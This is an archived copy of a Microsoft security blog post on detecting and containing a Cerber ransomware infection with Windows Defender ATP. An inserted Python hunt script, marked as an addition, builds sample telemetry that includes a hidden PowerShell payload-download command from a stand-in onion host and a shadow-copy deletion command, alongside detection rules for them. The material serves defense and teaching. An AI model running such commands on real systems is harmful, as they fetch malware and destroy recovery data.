{"id":6423,"date":"2017-01-30T03:00:36","date_gmt":"2017-01-30T11:00:36","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-260\/"},"modified":"2017-01-30T03:00:36","modified_gmt":"2017-01-30T11:00:36","slug":"news-260","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2017\/01\/30\/news-260\/","title":{"rendered":"Averting ransomware epidemics in corporate networks with Windows Defender ATP"},"content":{"rendered":"<p>Microsoft security researchers continue to observe <a href=\"https:\/\/blogs.technet.microsoft.com\/mmpc\/2016\/05\/18\/the-5ws-and-1h-of-ransomware\/\">ransomware<\/a> campaigns blanketing the market and indiscriminately hitting potential targets. Unsurprisingly, these campaigns also continue to use email and the web as primary delivery mechanisms. Also, it appears that most <a href=\"http:\/\/www.forbes.com\/sites\/thomasbrewster\/2016\/11\/28\/san-francisco-muni-hacked-ransomware\">corporate victims<\/a> are simply caught by the wide nets cast by ransomware operators. Unlike cyberespionage groups, ransomware operators do not typically employ special tactics to target particular organizations.<\/p>\n<p>Although indiscriminate ransomware attacks are very much like commodity malware infections, the significant cost that can result from a broad ransomware attack justifies consideration of a layered, defense-in-depth strategy that covers protection, detection, and response. As attacks reach the post-breach or post-infection layer\u2014when endpoint antimalware fails to stop a ransomware infection\u2014enterprises can benefit from post-breach detection solutions that provide comprehensive artifact information and the ability to quickly pivot investigations using these artifacts.<\/p>\n<p>Our research into prevalent ransomware families reveals that delivery campaigns can typically stretch for days or even weeks, all the while employing similar files and techniques. 
As long as enterprises can quickly investigate the first cases of infection, or \u2018patient zero\u2019, they can often stop ransomware epidemics outright. With <a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">Windows Defender Advanced Threat Protection<\/a> (Windows Defender ATP), enterprises can quickly identify and investigate these initial cases, and then use the captured artifact information to proactively protect the broader network.<\/p>\n<p>In this blog, we take a look at an actual <a href=\"https:\/\/www.microsoft.com\/security\/portal\/threat\/encyclopedia\/Entry.aspx?Name=Win32\/Cerber\">Cerber ransomware<\/a> infection delivered to an enterprise endpoint by a campaign that ran in late November 2016. We look at how Windows Defender ATP, in the absence of endpoint antimalware detections, can flag initial infection activity and help enterprises stop subsequent attempts to infect other devices.<\/p>\n<h2>Detecting Cerber ransomware behavior<\/h2>\n<p>In an <a href=\"https:\/\/blogs.technet.microsoft.com\/mmpc\/2016\/12\/21\/no-slowdown-in-cerber-ransomware-activity-as-2016-draws-to-a-close\/\">earlier blogpost<\/a>, we described how the Cerber ransomware family has been extremely active during the recent holiday season. It continues to be one of the most prevalent ransomware families affecting enterprises, as shown in Figure 1. Not only are there similarities between members of this widely distributed ransomware family; several Cerber behaviors are also common to malware in general. Detecting these behaviors can help stop even newly distributed threats.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"450\" height=\"410\" class=\"alignnone wp-image-10956\" alt=\"Ransomware encounters on enterprise endpoints\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-1-Ransomware-encounters-on-enterprise-endpoints.png\" \/><\/p>\n<p><i>Figure 1. 
Ransomware encounters on enterprise endpoints<\/i><\/p>\n<p>&nbsp;<\/p>\n<h3>A real case of Cerber meeting Windows Defender ATP<\/h3>\n<p>The Cerber ransomware infection started with a document downloaded into the <em>Downloads<\/em> folder through a webmail client. A user opened the document and triggered an embedded macro, which in turn launched a PowerShell command that downloaded another component carrying the ransomware payload. As shown below, the PowerShell command was detected by Windows Defender ATP. An Office application spawning PowerShell is itself a strong signal on a typical workstation, independent of what the command line contains.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"445\" class=\"alignnone wp-image-10965\" alt=\"PowerShell command detection\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-2-PowerShell-command-detection.png\" \/><\/p>\n<p><em>Figure 2. PowerShell command detection<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>Windows Defender ATP also generated an alert when the PowerShell script connected to a TOR anonymization website through a public proxy to download an executable. Security operations center (SOC) personnel could use such alerts to get the source IP and block this IP address at the firewall, preventing other machines from downloading the executable. In this case, the downloaded executable was the ransomware payload. Blocking one IP is a point fix, since a campaign can move to another proxy; the same alert also supports a broader rule, because managed workstations normally have no reason to reach a TOR gateway at all.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"156\" class=\"alignnone wp-image-10966\" alt=\"Alert for the TOR website connection showing the source IP address\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-3-Alert-for-the-TOR-website-connection-showing-the-source-IP-address.png\" \/><\/p>\n<p><em>Figure 3. 
Alert for the TOR website connection showing the source IP address<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>After the payload was downloaded into the <em>Temp<\/em> directory, it was executed by a parent <em>cmd.exe<\/em> process. The payload created a copy of itself in the <em>Users<\/em> folder and then launched that copy. Machine learning algorithms in Windows Defender ATP detected this self-launching behavior.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"216\" class=\"alignnone wp-image-10975\" alt=\"Ransomware launching copy of itself as detected on Windows Defender ATP\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-4-Ransomware-launching-copy-of-itself-as-detected-on-Windows-Defender-ATP.png\" \/><\/p>\n<p><em>Figure 4. Ransomware launching copy of itself as detected on Windows Defender ATP<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>Just prior to encrypting files, the Cerber ransomware tried to prevent future attempts at file recovery by deleting system restore points and all available volume shadow copies\u2014these are used by Windows System Restore and Windows Backup and Restore during recovery. This hostile behavior was also detected by Windows Defender ATP. Shadow copy deletion is a high-signal behavior on workstations, where legitimate software rarely performs it, so an alert for it deserves an urgent response on its own, whatever else has fired.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"353\" class=\"alignnone wp-image-10985\" alt=\"Deletion of volume shadow copies\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-5-Deletion-of-volume-shadow-copies.png\" \/><\/p>\n<p><em>Figure 5. Deletion of volume shadow copies<\/em><\/p>\n<p>&nbsp;<\/p>\n<h3>Breadth and depth of alerts enable easy scoping and containment<\/h3>\n<p>Windows Defender ATP generated at least four alerts during the infection process, a breadth of detection that provides coverage for changes in technique between Cerber versions, samples, and infection instances. 
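<\/p>\n<p>The five behaviors described above (Office spawning a PowerShell downloader, the connection to a TOR gateway, <em>cmd.exe<\/em> executing the payload from <em>Temp<\/em>, the payload launching its own copy, and shadow copy deletion), together with the two pivots the investigation below relies on (payload file name and payload source IP), as an added worked example that is not part of the original post and is not Windows Defender ATP code: a small Python hunt over constructed process and network telemetry. The event shape, host names, PIDs, file paths, the <em>203.0.113.10<\/em> address, the <em>abcdefgh.onion.to<\/em> host, the list of public TOR gateway domains and the stage names are all assumptions made for the example; the rules encode the behaviors described in the text, not the product's own detection logic.<\/p>

```python
from pathlib import PureWindowsPath

# Constructed telemetry for this example, not real Windows Defender ATP data.
# Windows paths are written with forward slashes so the sample stays free of escapes.
OFFICE = {'winword.exe', 'excel.exe', 'powerpnt.exe'}
TOR_GATEWAYS = ('.onion.to', '.onion.link', '.onion.cab', '.tor2web.org')  # assumed public Tor proxies

def proc(host, pid, ppid, image, cmdline=''):
    '''Process-creation event; cmdline defaults to the bare image name.'''
    return {'type': 'proc', 'host': host, 'pid': pid, 'ppid': ppid,
            'image': image, 'cmdline': cmdline or PureWindowsPath(image).name}

def net(host, pid, remote_ip, remote_host):
    '''Outbound-connection event.'''
    return {'type': 'net', 'host': host, 'pid': pid,
            'remote_ip': remote_ip, 'remote_host': remote_host}

TEMP_PAYLOAD = 'C:/Users/alice/AppData/Local/Temp/hjtudhb67.exe'
EVENTS = [
    # WS01 is patient zero: webmail document -> macro -> PowerShell downloader -> payload
    proc('WS01', 100, 90, 'C:/Program Files/Microsoft Office/Office16/WINWORD.EXE',
         'WINWORD.EXE C:/Users/alice/Downloads/invoice.doc'),
    proc('WS01', 110, 100, 'C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe',
         'powershell -NoP -W Hidden -c (New-Object Net.WebClient).DownloadFile(\"http://abcdefgh.onion.to/p\", \"'
         + TEMP_PAYLOAD + '\")'),
    net('WS01', 110, '203.0.113.10', 'abcdefgh.onion.to'),
    proc('WS01', 120, 110, 'C:/Windows/System32/cmd.exe', 'cmd /c ' + TEMP_PAYLOAD),
    proc('WS01', 130, 120, TEMP_PAYLOAD),
    proc('WS01', 140, 130, 'C:/Users/alice/hjtudhb67.exe'),  # payload launches its own copy
    proc('WS01', 150, 140, 'C:/Windows/System32/vssadmin.exe', 'vssadmin delete shadows /all /quiet'),
    # Other endpoints touched by the same campaign, plus an unrelated connection from WS05
    proc('WS02', 200, 190, 'C:/Users/bob/AppData/Local/Temp/hjtudhb67.exe'),
    net('WS02', 210, '203.0.113.10', 'abcdefgh.onion.to'),
    net('WS03', 300, '203.0.113.10', 'abcdefgh.onion.to'),
    proc('WS04', 400, 390, 'C:/Users/dana/Downloads/hjtudhb67.exe'),
    net('WS05', 500, '198.51.100.7', 'www.example.com'),
]

def name(path):
    return PureWindowsPath(path).name.lower()

def detect(events):
    '''Return (host, stage, detail) alerts for the behaviors the infection showed.'''
    by_pid = {(e['host'], e['pid']): e for e in events if e['type'] == 'proc'}
    alerts = []
    for e in events:
        if e['type'] == 'net':
            if e['remote_host'].lower().endswith(TOR_GATEWAYS):
                alerts.append((e['host'], 'tor_gateway_download', e['remote_ip']))
            continue
        parent = by_pid.get((e['host'], e['ppid']))
        pname = name(parent['image']) if parent else ''
        child, cmd = name(e['image']), e['cmdline'].lower()
        if pname in OFFICE and child == 'powershell.exe' and 'download' in cmd:
            alerts.append((e['host'], 'office_macro_powershell_download', e['cmdline']))
        if pname == 'cmd.exe' and '/appdata/local/temp/' in e['image'].lower():
            alerts.append((e['host'], 'cmd_runs_payload_from_temp', e['image']))
        if parent and pname == child and parent['image'].lower() != e['image'].lower():
            alerts.append((e['host'], 'self_copy_launch', e['image']))
        if ('vssadmin' in cmd and 'delete shadows' in cmd) or ('wmic' in cmd and 'shadowcopy delete' in cmd):
            alerts.append((e['host'], 'shadow_copy_deletion', e['cmdline']))
    return alerts

def hosts_with_file(events, filename):
    '''Pivot 1: every endpoint on which an image with this unusual file name ran.'''
    return sorted({e['host'] for e in events if e['type'] == 'proc' and name(e['image']) == filename.lower()})

def hosts_contacting(events, ip):
    '''Pivot 2: every endpoint that connected to the address that served the payload.'''
    return sorted({e['host'] for e in events if e['type'] == 'net' and e['remote_ip'] == ip})

def containment(events):
    '''Scope from patient zero outward: addresses to block at the firewall, hosts to isolate.'''
    alerts = detect(events)
    block_ips = sorted({d for _, stage, d in alerts if stage == 'tor_gateway_download'})
    payloads = {name(d) for _, stage, d in alerts if stage == 'cmd_runs_payload_from_temp'}
    isolate = {h for h, _, _ in alerts}
    for fname in payloads:
        isolate.update(hosts_with_file(events, fname))
    for ip in block_ips:
        isolate.update(hosts_contacting(events, ip))
    return {'block_ips': block_ips, 'isolate': sorted(isolate)}

if __name__ == '__main__':
    for host, stage, detail in detect(EVENTS):
        print(host, stage, detail)
    print(containment(EVENTS))
```

<p>Running the block prints the patient-zero alert chain on WS01 and a containment plan. The file-name pivot is deliberately kept separate from the alert logic: it finds WS04, which raised no alert, which is the case the text makes for hunting on artifacts rather than waiting for every endpoint to detonate the payload. A real pivot would use the file hash as well, because the name is the easiest thing for an operator to change between waves.<\/p>\n<p>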
To build up the mechanisms behind these alerts, Microsoft security researchers comb through ransomware families and identify common behaviors. Their research supports machine learning models and behavioral detection algorithms that detect ransomware at different stages of the kill chain, from delivery (by email or through exploit kits) up to the point where victims make ransom payments.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"196\" class=\"alignnone wp-image-10995\" alt=\"Alerts that correspond to different kill stages\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-6-Deletion-of-volume-shadow-copies.png\" \/><\/p>\n<p><em>Figure 6. Alerts that correspond to different kill chain stages<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>Each alert provides additional context about the attack. SOC personnel can use this contextual information to pivot an investigation and get insights from endpoints across the organization. Using the file and network activity information provided, pivoting investigations in the Windows Defender ATP console can yield conclusive leads even when no ransomware payload is detonated.<\/p>\n<p>To investigate our Cerber case, we use the name of the payload file <em>hjtudhb67.exe<\/em>, which is clearly unusual and unlikely to be used by legitimate executables. (A file name is a weak indicator on its own, since an operator can change it between waves; combine it with the file hash and the source IP wherever possible.) A quick search on the Windows Defender ATP console yields 23 other files with the same name. The files were created within a span of approximately 10 days and were scattered across endpoints in the organization. 
(Note that although most of these files are artifacts from the actual infection, some are possibly remnants of tests by SOC personnel who responded to the alerts.)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" width=\"800\" height=\"363\" class=\"alignnone wp-image-11015\" alt=\"Instances of file with the same unusual name as the ransomware\" src=\"https:\/\/msdnshared.blob.core.windows.net\/media\/2017\/01\/WDATP-Cerber-Figure-7b-Instances-of-file-with-the-same-unusual-name-as-the-ransomware.png\" \/><\/p>\n<p><em>Figure 7. Instances of file with the same unusual name as the ransomware<\/em><\/p>\n<p>&nbsp;<\/p>\n<p>We pivot to the source IP that hosted the payload file and perform a search that reveals 10 machines connected to this IP address. Blocking this source IP on the corporate firewall on the day of the first infection could have helped prevent the Cerber ransomware payload file from reaching other machines; the same search gives the list of machines that still need to be examined once the block is in place.<\/p>\n<h2>Conclusion: Defense-in-depth with Windows Defender ATP<\/h2>\n<p>We have seen how Windows Defender ATP provides enterprise SOC personnel with a powerful view of events and behaviors associated with a ransomware infection, from the time of initial delivery and throughout the installation process. Enterprise SOC personnel are able to understand how ransomware has reached an endpoint, assess the extent of the damage, and identify artifacts that can be used to prevent further damage. These capabilities are made possible by cloud analytics that continuously search for and flag signs of hostile activity, including signs that could have been missed in other defensive layers.<\/p>\n<p>Upcoming enhancements to Windows Defender ATP with the <a href=\"https:\/\/blogs.windows.com\/business\/2016\/12\/06\/windows-10-creators-update-advances-security-best-class-modern-tools\/\">Windows 10 Creators Update<\/a> will take its capabilities one step further by enabling network isolation of compromised machines. 
The update will also provide an option to quarantine and prevent subsequent execution of files.<\/p>\n<p>Windows Defender ATP is built into the core of Windows 10 Enterprise and can be <a href=\"https:\/\/www.microsoft.com\/en-us\/WindowsForBusiness\/windows-atp\">evaluated free of charge<\/a>.<\/p>\n<h3>Windows 10 security against Cerber ransomware<\/h3>\n<p>Windows 10 is built with security technologies that can help detect the latest batch of Cerber ransomware.<\/p>\n<ul>\n<li><a href=\"https:\/\/support.microsoft.com\/en-us\/help\/17464\/windows-defender-help-protect-computer?ocid=-2147269815\">Windows Defender<\/a> detects Cerber ransomware as <a href=\"https:\/\/www.microsoft.com\/security\/portal\/threat\/encyclopedia\/Entry.aspx?Name=Win32\/Cerber\">Win32\/Cerber<\/a>. It also detects files that assist in the distribution of the payload file using email and exploit kits. Malicious email attachments are detected as <a href=\"https:\/\/www.microsoft.com\/security\/portal\/threat\/encyclopedia\/entry.aspx?Name=TrojanDownloader%3AO97M%2FDonoff\">TrojanDownloader:O97M\/Donoff<\/a>, and the RIG exploit kit is detected as <a href=\"https:\/\/www.microsoft.com\/security\/portal\/threat\/encyclopedia\/Entry.aspx?Name=Exploit:HTML\/Meadgive.W\">Exploit:HTML\/Meadgive<\/a>.<\/li>\n<li>For security on the web, <a href=\"https:\/\/blogs.windows.com\/msedgedev\/2015\/05\/11\/microsoft-edge-building-a-safer-browser\/\">Microsoft Edge<\/a> browser can help prevent exploit kits from running and executing ransomware on computers. 
<a href=\"https:\/\/blogs.windows.com\/msedgedev\/2015\/12\/16\/smartscreen-drive-by-improvements\/\">SmartScreen Filter<\/a> uses URL reputation to block access to malicious sites, such as those hosting exploit kits.<\/li>\n<li><a href=\"https:\/\/technet.microsoft.com\/en-us\/itpro\/windows\/keep-secure\/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies\">Device guard<\/a> protects systems from malicious applications like ransomware\u00a0by maintaining a custom catalog of known good applications and stopping even kernel-level malware with virtualization-based security.<\/li>\n<li><a href=\"http:\/\/social.technet.microsoft.com\/wiki\/contents\/articles\/5211.how-to-configure-applocker-group-policy-to-prevent-software-from-running.aspx\">AppLocker group policy<\/a> also prevents dubious software from running.<\/li>\n<\/ul>\n<h3>Office and Office 365 security against Cerber ransomware<\/h3>\n<p><a href=\"https:\/\/blogs.office.com\/2016\/01\/14\/leading-the-way-in-the-fight-against-dangerous-email-threats\/\">Office 365 Advanced Threat Protection<\/a> blocks emails that spread malicious documents that could eventually install Cerber. 
IT administrators can use <a href=\"https:\/\/blogs.technet.microsoft.com\/mmpc\/2016\/03\/22\/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection\/\">Group Policy in Office 2016<\/a> to block macros in documents that originate from the Internet, including the documents inside the password-protected attachments commonly used in Cerber campaigns; the password keeps mail gateways from inspecting the attachment, so a client-side macro block is the control to rely on for these.<\/p>\n<p>&nbsp;<\/p>\n<p><em>Tommy Blizard <\/em><\/p>\n<p><em>Windows Defender ATP Research Team<\/em><\/p>\n<p><a href=\"https:\/\/blogs.technet.microsoft.com\/mmpc\/2017\/01\/30\/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp\/\" target=\"bwo\" >https:\/\/blogs.technet.microsoft.com\/mmpc\/feed\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Microsoft security researchers continue to observe ransomware campaigns blanketing the market and indiscriminately hitting potential targets. Unsurprisingly, these campaigns also continue to use email and the web as primary delivery mechanisms. Also, it appears that most corporate victims are simply caught by the wide nets cast by ransomware operators. 
Unlike cyberespionage groups, ransomware operators do&#8230;<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10759,10378],"tags":[10864,10760,11137,3765,10761,10762,10865],"class_list":["post-6423","post","type-post","status-publish","format-standard","hentry","category-microsoft","category-security","tag-advanced-persistent-threats","tag-antimalware-research-for-it-pros-and-enthusiasts","tag-creators-update","tag-ransomware","tag-windows-10","tag-windows-defender","tag-windows-defender-atp"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6423","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6423"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6423\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6423"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6423"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6423"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}